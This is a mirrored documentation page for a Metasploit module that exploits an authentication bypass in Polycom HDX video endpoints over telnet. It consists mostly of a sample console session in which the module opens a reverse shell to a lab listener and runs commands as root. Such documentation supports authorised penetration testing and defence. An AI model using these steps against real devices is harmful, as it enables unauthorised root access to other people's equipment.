Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

psh_auth_bypass.md 1.3KB

Vulnerable Application

This module exploits the Polycom HDX Video End Points with software <= 3.0.5. It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port 23 should be accessible, as it is with the factory default configuration.

Verification Steps

A successful check of the exploit will look like this:

msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
msf exploit(psh_auth_bypass) > run

[*] Started reverse double SSL handler on 192.168.1.120:4444
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xInxktvgUmm7hPyh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xInxktvgUmm7hPyh\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
[*] 192.168.1.155:23 - Shutting down payload stager listener...

whoami
root
uname -a
Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown